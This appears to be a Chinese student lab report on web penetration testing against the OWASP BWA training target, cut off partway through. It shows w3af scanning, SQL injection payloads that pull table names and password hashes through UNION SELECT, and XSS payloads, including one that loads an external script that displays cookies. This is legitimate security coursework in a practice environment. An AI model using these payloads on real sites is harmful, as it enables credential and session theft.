实验3Web应用程序渗透测试 实验时间：2014/10/29实验地点：实验室1428； 一、实验目的 1.学习使用OWASPBWA靶机。 2.学习使用KaliLinux进行Web应用程序渗透测试。 二、实验内容 1.使用w3af漏洞扫描器对OWASPBWA靶机进行漏洞扫描。 2.根据老师的课堂讲授，按照课件相关内容在OWASPBWA靶机上实践XSS和SQL注入两种攻击。 3.配合使用TamperData和sqlmap进行sql注入攻击。 4.利用文件上传漏洞植入Webshell。 三、主要实验结果（请截屏） （一）使用w3af漏洞扫描器对OWASPBWA靶机进行漏洞扫描 1.如图启动w3af漏洞扫描器。 2.编辑新建的Profile，也就是配置各种插件。 对audit类插件勾选sqli和xss两个插件，如下图： 对crawl类插件只勾选web_spider，如下图 对web_spider的配置在窗口右侧，勾选only_forward并保存，如下图 对output类插件，只勾选输出html文件。对输出文件的配置在窗口右侧，如下图输入文件名称并保存。这样扫描结果将保存在/root/dvwa.html文件中。 4.如下图在Target一栏输入扫描的网址，单击右侧按钮start启动扫描。 扫描过程中 扫描结果 在OWASPBWA靶机上实践XSS和SQL注入两种攻击 1.在KaliLinux攻击主机上，按照课件，实践“通过SQL注入攻击绕过身份认证机制”。 2.XSS和SQL注入攻击 （1）在攻击机上访问http://www.dvssc.com/dvwa，按照1.的攻击方法，登录进入DVWA训练系统。 （2）首先按照图示将DVWA应用的安全等级设置为Low。 按照课件29-31页，实践SQL注入攻击。 使用OWASPBWA靶机的DVWA应用程序演示如何获取后台数据库更多的信息。 输入文件“XSS&SQLi.txt”中的脚本。 将数据表中的每一行都显示出来，输入：'or'1=1 查询INFORMATION_SCHEMA系统表，输入：'UNIONSELECT1,table_namefromINFORMATION_SCHEMA.tables--' 列出user表的内容，输入：'UNIONSELECT1,column_namefromINFORMATION_SCHEMA.columnswheretable_name='users'--' ④取得口令的MD5值，输入：'UNIONSELECTNULL,passwordfromusers--' ⑤使用concat()函数将所有的信息都列出来，输入：'UNIONSELECTpassword,concat(first_name,'',last_name,'',user)fromusers--' （4）按照课件，实践反射式XSS攻击。 输入<script>alert('Havefuns')</script> 输入<script>alert(document.cookie)</script> 按照课件，访问http://www.dvssc.com/mutillidae，登录进入mutilidae训练系统，实践存储式XSS攻击。 访问Mutillidae的CrossSiteScripting(XSS) 输入：<SCRIPT/XSSSRC="http://ha.ckers.org/xss.js"></SCRIPT> xss.js的内容如下： document.write("Thisisremotetextviaxss.jslocatedatha.ckers.org"+document.cookie); alert("Thisisremotetextviaxss.jslocatedatha.ckers.org"+document.cookie); 首先按照sql注入攻击登录进入mutilidae训练系统 输入：<SCRIPT/XSSSRC="http://ha.ckers.org/xss.js"></SCRIPT> document.write("Thisisremotetextviaxss.jslocatedatha.ckers.org"+document.cookie); alert("Thisisremotetextviaxss.jslocatedatha.ckers.org"+document.cookie); （三）配合使用TamperData和sqlmap进行sql注入攻击 重复（二）中步骤2-（1）和2-（2）。 启动TamperData插件。 按照课件33页使用Sqlmap进行SQL